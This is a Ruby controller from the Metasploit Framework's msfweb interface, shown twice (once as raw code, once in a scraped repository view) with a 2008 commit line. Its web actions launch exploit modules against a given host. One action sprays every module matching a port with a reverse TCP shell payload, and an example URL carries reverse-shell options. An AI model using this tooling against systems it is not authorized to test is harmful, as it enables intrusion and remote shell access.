metasploit-framework/dev/pwncraft/exploits_controller.rb

# Author: LMH <lmh@info-pull.com>
# Description: The exploit controller of msfweb v.3. Handles views, listing
# and other actions related to exploit modules. Code and processing goes here.
# Instance variables, final values, etc, go into views.

class ExploitsController < ApplicationController
layout 'windows'

def list
end

# exploits/exploit?host=<h>&port=<p>
def exploit_target
	host = params[:host]
	port = params[:port]

	$msframework.exploits.each_module { |name, mod|
		exploit = $msframework.exploits.create(name)

		next if exploit.nil?

		rport = exploit.datastore['RPORT']

		next if rport.nil?
		next if rport.to_i != port.to_i

		$stdout.puts "trying exploit #{exploit.refname} against #{host}/#{port}"
			
		begin
			exploit.datastore['RHOST'] = host

			# Run the exploit against the target
			@new_session = exploit.exploit_simple(
				'Payload'     => 'generic/shell_reverse_tcp',
				'LocalOutput' => Rex::Ui::Text::Output::Stdio.new)
		rescue Exception => e
			@emsg = e
		end
			
		break if @new_session	
	}

	if @new_session
		render_text "SUCCESS #{@new_session.sid}"
	else
		render_text "FAILURE #{@emsg}"
	end

end

# exploits/exploit?refname=test:aggressive&payload=windows:shell:reverse_tcp&options=RHOST=10.87.43.103,LHOST=10.87.43.2
def exploit
	@tmod = get_view_for_module("exploit", params[:refname])

	render_text "FAILURE Invalid module #{params[:refname]}" if not @tmod
	render_text "FAILURE Invalid payload #{params[:payload]}" if not params[:payload]

	$stdout.puts "tmod is #{@tmod.name}, #{params[:options]}"
	
	begin
		# Run the exploit against the target
		@new_session = @tmod.exploit_simple(
			'Payload'     => params[:payload].gsub(':', '/'),
			'OptionStr'   => (params[:options] || '').gsub(':', '/'),
			'LocalOutput' => Rex::Ui::Text::Output::Stdio.new)
	rescue Exception => e
		@emsg = e
	end
	
	$stdout.puts "session is #{@new_session}"

	if @new_session
		render_text "SUCCESS #{@new_session.sid}"
	else
		render_text "FAILURE #{@emsg}"
	end
end

def view
	@tmod = get_view_for_module("exploit", params[:refname])
	
	unless @tmod
	 render_text "Unknown module specified."
	end
end

def config
	# Retrieve object to module with the given refname
	@tmod     = get_view_for_module("exploit", params[:refname])
	unless @tmod
		render_text "Unknown module specified."
	end
	
	# Get target, using index given in 'target' parameter
	@target   = @tmod.targets[params[:target].to_i]
	unless @target
		render_text "Unknown target specified."
	end
	
	@tmod.datastore['TARGET'] = params[:target].to_i
	
	@cur_step = nil
	if params[:step]
		@cur_step = params[:step]
	end
	
	
	if (params[:payload])
	
		if (params[:payload] =~ /^\d+$/ )
			@payload_ref = @tmod.compatible_payloads[params[:payload].to_i]
		else
			@tmod.compatible_payloads.each_with_index do |ref, i|

				if(ref[0] == params[:payload])
					@payload_ref = ref
				end
			end
		end
	end


	if @cur_step == "exploit"
		
		# Always show the option page after an exploit is launched
		@cur_step = "config"
		
		unless @payload_ref
			render_text "Unknown payload specified or not supported."
		end
		
		@payload_name, @payload_class  = @payload_ref
		@payload_inst = @payload_class.new 

		# Create a new console driver instance
		@cid = $msfweb.create_console()
		@con = $msfweb.consoles[@cid]

		# Use the selected module
		@con.execute("use exploit/#{@tmod.refname}")

		# Configure the target and payload	
		@exploit = @con.active_module
		@exploit.datastore['PAYLOAD'] = @payload_name
		@exploit.datastore['TARGET']  = params[:target].to_i

		# Configure the selected options
		params.each_key do |k|
			eopt = k.to_s.match(/^eopt_/) ? true : false
			popt = k.to_s.match(/^popt_/) ? true : false
			name = k.to_s.gsub(/^.opt_/, '')

			if (eopt or popt)
				if (params[k] and params[k].to_s.length > 0)
					@exploit.datastore[name] = params[k].to_s
				end
			end
		end

		# Validate the exploit and payload options
		@payload_inst.share_datastore(@exploit.datastore)
		
		begin
			@exploit.options.validate(@exploit.datastore)
			@payload_inst.options.validate(@payload_inst.datastore)
			@con.write("exploit\n")
			@exploit_console = @cid
		rescue ::Exception => e
			$msfweb.destroy_console(@cid)
			@exploit_error = e.to_s
		end	
	end
	
	
	if @cur_step == "config"
		
		unless @payload_ref
			render_text "Unknown payload specified or not supported."
		end
		
		@payload_name, @payload_class = @payload_ref
		@payload_inst = @payload_class.new 
		
	else
		@payloads = @tmod.compatible_payloads
	end
	
end


end
merge incognito updates from Luke Jennings git-svn-id: file:///home/svn/framework3/trunk@5499 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-28 16:57:49 +00:00			`# Author: LMH <lmh@info-pull.com>`
			`# Description: The exploit controller of msfweb v.3. Handles views, listing`
			`# and other actions related to exploit modules. Code and processing goes here.`
			`# Instance variables, final values, etc, go into views.`

			`class ExploitsController < ApplicationController`
			`layout 'windows'`

			`def list`
			`end`

			`# exploits/exploit?host=<h>&port=<p>`
			`def exploit_target`
			`host = params[:host]`
			`port = params[:port]`

			`$msframework.exploits.each_module { \|name, mod\|`
			`exploit = $msframework.exploits.create(name)`

			`next if exploit.nil?`

			`rport = exploit.datastore['RPORT']`

			`next if rport.nil?`
			`next if rport.to_i != port.to_i`

			`$stdout.puts "trying exploit #{exploit.refname} against #{host}/#{port}"`

			`begin`
			`exploit.datastore['RHOST'] = host`

			`# Run the exploit against the target`
			`@new_session = exploit.exploit_simple(`
			`'Payload' => 'generic/shell_reverse_tcp',`
			`'LocalOutput' => Rex::Ui::Text::Output::Stdio.new)`
			`rescue Exception => e`
			`@emsg = e`
			`end`

			`break if @new_session`
			`}`

			`if @new_session`
			`render_text "SUCCESS #{@new_session.sid}"`
			`else`
			`render_text "FAILURE #{@emsg}"`
			`end`

			`end`

			`# exploits/exploit?refname=test:aggressive&payload=windows:shell:reverse_tcp&options=RHOST=10.87.43.103,LHOST=10.87.43.2`
			`def exploit`
			`@tmod = get_view_for_module("exploit", params[:refname])`

			`render_text "FAILURE Invalid module #{params[:refname]}" if not @tmod`
			`render_text "FAILURE Invalid payload #{params[:payload]}" if not params[:payload]`

			`$stdout.puts "tmod is #{@tmod.name}, #{params[:options]}"`

			`begin`
			`# Run the exploit against the target`
			`@new_session = @tmod.exploit_simple(`
			`'Payload' => params[:payload].gsub(':', '/'),`
			`'OptionStr' => (params[:options] \|\| '').gsub(':', '/'),`
			`'LocalOutput' => Rex::Ui::Text::Output::Stdio.new)`
			`rescue Exception => e`
			`@emsg = e`
			`end`

			`$stdout.puts "session is #{@new_session}"`

			`if @new_session`
			`render_text "SUCCESS #{@new_session.sid}"`
			`else`
			`render_text "FAILURE #{@emsg}"`
			`end`
			`end`

			`def view`
			`@tmod = get_view_for_module("exploit", params[:refname])`

			`unless @tmod`
			`render_text "Unknown module specified."`
			`end`
			`end`

			`def config`
			`# Retrieve object to module with the given refname`
			`@tmod = get_view_for_module("exploit", params[:refname])`
			`unless @tmod`
			`render_text "Unknown module specified."`
			`end`

			`# Get target, using index given in 'target' parameter`
			`@target = @tmod.targets[params[:target].to_i]`
			`unless @target`
			`render_text "Unknown target specified."`
			`end`

			`@tmod.datastore['TARGET'] = params[:target].to_i`

			`@cur_step = nil`
			`if params[:step]`
			`@cur_step = params[:step]`
			`end`


			`if (params[:payload])`

			`if (params[:payload] =~ /^\d+$/ )`
			`@payload_ref = @tmod.compatible_payloads[params[:payload].to_i]`
			`else`
			`@tmod.compatible_payloads.each_with_index do \|ref, i\|`

			`if(ref[0] == params[:payload])`
			`@payload_ref = ref`
			`end`
			`end`
			`end`
			`end`


			`if @cur_step == "exploit"`

			`# Always show the option page after an exploit is launched`
			`@cur_step = "config"`

			`unless @payload_ref`
			`render_text "Unknown payload specified or not supported."`
			`end`

			`@payload_name, @payload_class = @payload_ref`
			`@payload_inst = @payload_class.new`

			`# Create a new console driver instance`
			`@cid = $msfweb.create_console()`
			`@con = $msfweb.consoles[@cid]`

			`# Use the selected module`
			`@con.execute("use exploit/#{@tmod.refname}")`

			`# Configure the target and payload`
			`@exploit = @con.active_module`
			`@exploit.datastore['PAYLOAD'] = @payload_name`
			`@exploit.datastore['TARGET'] = params[:target].to_i`

			`# Configure the selected options`
			`params.each_key do \|k\|`
			`eopt = k.to_s.match(/^eopt_/) ? true : false`
			`popt = k.to_s.match(/^popt_/) ? true : false`
			`name = k.to_s.gsub(/^.opt_/, '')`

			`if (eopt or popt)`
			`if (params[k] and params[k].to_s.length > 0)`
			`@exploit.datastore[name] = params[k].to_s`
			`end`
			`end`
			`end`

			`# Validate the exploit and payload options`
			`@payload_inst.share_datastore(@exploit.datastore)`

			`begin`
			`@exploit.options.validate(@exploit.datastore)`
			`@payload_inst.options.validate(@payload_inst.datastore)`
			`@con.write("exploit\n")`
			`@exploit_console = @cid`
			`rescue ::Exception => e`
			`$msfweb.destroy_console(@cid)`
			`@exploit_error = e.to_s`
			`end`
			`end`


			`if @cur_step == "config"`

			`unless @payload_ref`
			`render_text "Unknown payload specified or not supported."`
			`end`

			`@payload_name, @payload_class = @payload_ref`
			`@payload_inst = @payload_class.new`

			`else`
			`@payloads = @tmod.compatible_payloads`
			`end`

			`end`


			`end`